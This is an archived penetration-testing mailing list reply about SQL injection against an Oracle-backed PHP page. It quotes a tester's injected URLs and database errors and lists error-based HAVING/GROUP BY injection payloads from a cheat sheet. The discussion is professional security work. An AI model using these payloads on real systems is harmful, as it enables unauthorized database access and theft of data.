Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Oracle URL SQL Injection issue

from [Jason Thompson] Network Security [Permanent Link]
Subject: Re: Oracle URL SQL Injection issue
Date: Fri, 18 Jan 2008 14:19:49 -0500 
Did you try HAVING 1=1? I use that all the time.

From: http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/

Finding Column Names with HAVING BY - Error Based (S)

In the same order,

    * ' HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2,
columnfromerror(n) HAVING 1=1 -- and so on
    * If you are not getting any more error then it's done.


I've rarely seen UNION SELECT work except in some cases... tables have
to be structured a certain way bc of how UNION works.

-J

On Jan 17, 2008 7:21 PM, Clone <c70n3@yahoo.co.in> wrote:

Hey List

I am pen testing a web app that supplies sql
parameters on the URL something like

http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to confirm
the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90'

I get

ociparse() [function.ociparse]: OCIParse: ORA-01756:
quoted string not properly terminated in item.php on
line 312

Then I tried (after confirming presence of usr table
name)

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--

and I get the error

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01789: query block has incorrect number of result
columns in dbs.inc on line 44

I know one valid user account in the oracle DB.

Any idea what's the best strategy to move forward?

I'm not getting any further from here so far.

Any advise / helpo would be much appreciated.

Cheers'



      5, 50, 500, 5000 - Store N number of mails in your inbox. Go to 
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------




------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: Thoughts of the paranoid on the call centre security., Sean Jackson
Next by Date:  Re: http TRACE option, Campbell Murray
Previous by Thread:  Re: Oracle URL SQL Injection issue, Cesar
Next by Thread:  Re: Oracle URL SQL Injection issue, Francois Larouche
Indexes:  [Date] [Thread] [Top] [All Lists]